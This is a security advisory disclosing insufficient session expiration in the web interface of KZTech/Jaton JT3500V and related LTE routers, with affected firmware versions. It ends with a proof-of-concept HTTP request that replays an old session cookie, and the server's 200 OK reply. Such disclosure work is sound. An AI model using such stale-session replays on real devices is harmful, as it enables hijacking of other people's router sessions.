KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Insufficient Session Expiration  
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.  
Product web page: | |  
Affected version: Model | Firmware  
JT3500V | 2.0.1B1064  
JT3300V | 2.0.1B1047  
AM6200M | 2.0.0B3210  
AM6000N | 2.0.0B3042  
AM5000W | 2.0.0B3037  
AM4200M | 2.0.0B2996  
AM4100V | 2.0.0B2988  
AM3500MW | 2.0.0B1092  
AM3410V | 2.0.0B1085  
AM3300V | 2.0.0B1060  
AM3100E | 2.0.0B981  
AM3100V | 2.0.0B946  
AM3000M | 2.0.0B21  
KZ7621U | 2.0.0B14  
KZ3220M | 2.0.0B04  
KZ3120R | 2.0.0B01  
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi  
& VoIP CPE product specially designed to enable quick and easy  
LTE fixed data service deployment for residential and SOHO customers.  
It provides high speed LAN, Wi-Fi and VoIP integrated services  
to end users who need both bandwidth and multi-media data service  
in residential homes or enterprises. The device has 2 Gigabit LAN  
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and  
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing  
and firewall software for security. It provides an effective  
all-in-one solution to SOHO or residential customers. It can  
deliver up to 1Gbps max data throughput which can be very  
competitive to wired broadband access service.  
Desc: The application suffers an insufficient session expiration.  
This occurs when the web application permits an attacker to reuse  
old session credentials or session IDs for authorization. Insufficient  
session expiration increases the device's exposure to attacks that  
can steal or reuse user's session identifiers.  
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN  
Linux 2.6.36+ (mips)  
Mediatek APSoC SDK v4.3.1.0  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2021-5646  
Advisory URL:  
Session valid after 48 hours:  
GET /status.html HTTP/1.1  
Connection: keep-alive  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6  
Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b  
HTTP/1.0 200 OK  
Date: Thu Feb 11 00:29:39 2021  
Server: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN  
Pragma: no-cache  
Cache-Control: no-cache  
Content-type: text/html